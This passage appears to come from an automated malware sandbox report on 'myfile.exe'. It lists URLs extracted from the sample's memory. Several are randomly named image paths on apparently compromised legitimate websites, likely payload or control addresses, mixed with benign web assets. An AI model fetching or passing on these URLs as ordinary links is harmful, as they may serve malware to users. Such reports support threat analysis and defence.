            Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://90nguyentuan.com/wp-content/pics/rbfaqbvnxelf.jpg
            Source: myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://90nguyentuan.com:443/wp-content/pics/rbfaqbvnxelf.jpgource0
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://9adac216.rocketcdn.me
            Source: myfile.exe, 00000000.00000003.2503575660.0000000005B39000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/1000x1000/b285b1caef/social-share-default.png
            Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/173x191/46f511e89b/frame-8707.png
            Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/173x191/e1180c19ea/frame-8707-4.png
            Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/173x191/ff8a0137ac/frame-8707-3.png
            Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/174x174/6a375a03d8/become-a-member-new.png
            Source: myfile.exe, 00000000.00000003.2503677440.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/1868x906/f75d4e9a79/kids-jumping.png/m/);display:none;
            Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/1920x2746/013c53af19/truegrit_full_light.jpg
            Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/1920x2746/71a2ff4150/truegrit_full_purple.jpg);background-position:
            Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/2000x1334/496b6b2333/121622_altitude_kathytran_img_3948.jpeg
            Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/2000x1334/db83d01729/121622_altitude_kathytran_img_2698.jpg
            Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/2880x1418/6a7e0f8ef0/altitude-230615-mk-home-page-image-edit.png
            Source: myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/4000x1677/e2752eb3be/121622_altitude_kathytran_img_0967_extended.jp
            Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/428x668/95a47a6a61/updatedmobilehero.jpg
            Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/538x872/c3b5d925b9/attraction-basket-ball.png
            Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/538x872/e2831bc945/attraction-dodge-ball.png
            Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/538x872/eb9c0d6ee6/attraction-main-court.png
            Source: myfile.exe, 00000000.00000003.2503677440.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/628x412/deb6e6f16f/121622_altitude_kathytran_img_2328-1.png/m/
            Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.storyblok.com/f/201186/910x935/661205b117/little-girl-jumping-in-air-purple.png
            Source: myfile.exe, 00000000.00000003.2839035490.0000000005B39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abulanov.c
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abulanov.com:443/news/temp/md.pngmtpqdcchulbw.jpgfault
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activeterroristwarningcompany.com:443/news/pics/dpgo.gifyc.jpgbudsrejserallinclusive.dk/uplo
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://afbudsrejserallinclusive.dk/uploads/assets/xwncifkynx.gif
            Source: myfile.exe, 00000000.00000003.2503677440.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589691593.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600404554.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://afbudsrejserallinclusive.dk/uploads/assets/xwncifkynx.gifHk
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://afbudsrejserallinclusive.dk:443/uploads/assets/xwncifkynx.gifage
            Source: myfile.exe, 00000000.00000002.2895379820.0000000005B3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://almamidwifery.com/
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://almamidwifery.com/content/assets/jlbaveucagau.png
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://almamidwifery.com/content/assets/jlbaveucagau.pngjpgZ
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://almamidwifery.com:443/content/assets/jlbaveucagau.pngurce0
            Source: myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altitudeboise.com:443/content/temp/pg.jpgesources
            Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altitudefranchise.com/
            Source: myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altitudetrampolinepark.com:443/ixizcyhfz.jpgrces
            Source: myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amelielecompte.wordpress.com/0
            Source: myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amelielecompte.wordpress.com/O
            Source: myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amelielecompte.wordpress.com/Q
            Source: myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amelielecompte.wordpress.com/news/tmp/ohnnewfmmc.png
            Source: myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amelielecompte.wordpress.com/z
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amelielecompte.wordpress.com:443/news/tmp/ohnnewfmmc.pngmagrinya.netmagrinya.net
            Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animate.style/
            Source: myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avisioninthedesert.com/
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avisioninthedesert.com/wp-content/graphic/lgul.jpg
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avisioninthedesert.com/~
            Source: myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bayshoreelite.com/
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bayshoreelite.com/comments/feed/
            Source: myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bayshoreelite.com/data/game/mfkyhvlfokmitv.png
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bayshoreelite.com/feed/
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bd2fly.com:443/static/game/nkfydhwjjfbipa.jpgicgx.jpgurce0
            Source: myfile.exe, 00000000.00000003.2839035490.0000000005B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bundan.com/wp-co
            Source: myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bundan.com/wp-content/temp/wkeqlpss.png
            Source: myfile.exe, 00000000.00000003.2468286003.0000000000FDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://business-basic.de/news/graphic/yooacevq.jpg
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://business-basic.de/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://business-basic.de/wp-content/plugins/under-construction-page/themes/css/common.css?v=4.01
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://business-basic.de/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://business-basic.de/wp-content/plugins/under-construction-page/themes/images/favicon.png
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://business-basic.de/wp-content/plugins/under-construction-page/themes/plain_text/style.css?v=4
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://business-basic.de/wp-content/plugins/under-construction-page/themes/plain_text/ucp-cog.png
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://business-basic.de/wp-login.php
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
            Source: myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chainofhopeeurope.eu/(
            Source: myfile.exe, 00000000.00000003.2589691593.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chainofhopeeurope.eu/?
            Source: myfile.exe, 00000000.00000003.2600404554.000000000103E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589691593.000000000103D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chainofhopeeurope.eu/data/graphic/tcafyhpt.jpg
            Source: myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chainofhopeeurope.eu/data/graphic/tcafyhpt.jpg6
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chainofhopeeurope.eu:443/data/graphic/tcafyhpt.jpgesource0
            Source: myfile.exe, 00000000.00000003.2589691593.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chomiksy.net/
            Source: myfile.exe, 00000000.00000003.2589691593.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chomiksy.net/i
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chomiksy.net/png
            Source: myfile.exe, 00000000.00000003.2600387673.0000000005B11000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chomiksy.net/wp-content/temp/vudowd.png
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chomiksy.net/wp-content/temp/vudowd.pnggD
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chomiksy.net:443/wp-content/temp/vudowd.png811-000d3aa4692b
            Source: myfile.exe, 00000000.00000003.2839610274.0000000005B25000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cs.iubenda.com/autoblocking/3544219.js
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://davedavisphotos.com/
            Source: myfile.exe, 00000000.00000003.2839610274.0000000005B11000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://davedavisphotos.com/content/tmp/xp.jpg
            Source: myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://davedavisphotos.com/content/tmp/xp.jpggD
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://davedavisphotos.com/g
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://davedavisphotos.com/gifw
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://davedavisphotos.com/h
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://davedavisphotos.com:443/content/tmp/xp.jpglexced.comwww.lexced.com
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enactusnhlstenden.com/
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enactusnhlstenden.com/wp-content/assets/bfrdpc.gif
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enactusnhlstenden.com/wp-content/assets/bfrdpc.gifS
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/css?family=Montserrat:400
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=DM
            Source: myfile.exe, 00000000.00000003.2589306558.000000000439D000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Rubik:wght
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://georgemuncey.com/admin/gam
            Source: myfile.exe, 00000000.00000003.2503575660.0000000005B39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sindresorhus/modern-normalize
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://holocine.de/wp-json/
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://holocine.de:443/data/assets/hxdtlt.gifgicdxmun.gifesource0
            Source: myfile.exe, 00000000.00000002.2895379820.0000000005B1C000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hostaletdelsindians.es/news/temp/wpuatzictpgv.jpg
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hostaletdelsindians.es:443/news/temp/wpuatzictpgv.jpggx.gifage
            Source: myfile.exe, 00000000.00000003.2839610274.0000000005B31000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839035490.0000000005B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ikadomus.com
            Source: myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ikadomus.com/news/tmp/zrxchmwcslab.gif
            Source: myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ikadomus.com:443/news/tmp/zrxchmwcslab.gifiathwnvkwf.gife0
            Source: myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589328177.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images.squarespace-cdn.com
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images.squarespace-cdn.com/content/v1/5ad68080a9e028226c1155ed/76390403-0988-4064-9bd4-1d8ec
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://innervisions-id.com/
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://innervisions-id.com//
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://innervisions-id.com/h
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://innervisions-id.com/png
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://innervisions-id.com/wp-content/images/kpgkqb.jpg
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://innervisions-id.com/wp-content/images/kpgkqb.jpg/g
            Source: myfile.exe, 00000000.00000002.2895361971.000000000439F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://innervisions-id.com/wp-content/images/kpgkqb.jpgq
            Source: myfile.exe, 00000000.00000002.2895379820.0000000005B1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://innervisions-id.com/wp-content/images/kpgkqb.jpgr
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://innervisions-id.com/wp-content/images/kpgkqb.jpgw
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://innervisions-id.com:443/wp-content/images/kpgkqb.jpg.gife0
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://karnesstanleyhvac.com/
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://karnesstanleyhvac.com/(
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://karnesstanleyhvac.com/content/images/gv.png
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://karnesstanleyhvac.com/content/images/gv.png#)
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://karnesstanleyhvac.com/content/images/gv.pngDK
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://karnesstanleyhvac.com/content/images/gv.pngLocationETagAuthentication-InfoAgeAccept-RangesLa
            Source: myfile.exe, 00000000.00000003.2468286003.0000000000FDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://karnesstanleyhvac.com/content/images/gv.pngcom
